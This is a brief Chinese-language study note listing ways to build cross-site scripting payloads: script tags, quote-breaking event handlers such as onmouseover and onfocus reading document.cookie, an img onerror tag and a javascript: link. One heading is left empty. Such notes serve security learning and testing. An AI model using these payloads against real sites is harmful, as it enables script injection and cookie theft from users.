xss的构造方式:
一,尖括号构造 <script>alert(1)</script>
二,事件构造 "onmouseover="alert(1)
"onfocus="alert(document.cookie)
例如:已知输入点,首先先闭合双引号,则构造如下语句
” onmouseover="alert(1)" type="text
<img src="x" onerror="alert(1)">//属性需要加双引号
变形之后:
三,构造伪协议
<a href=javascript:alert(1)>click on!</a>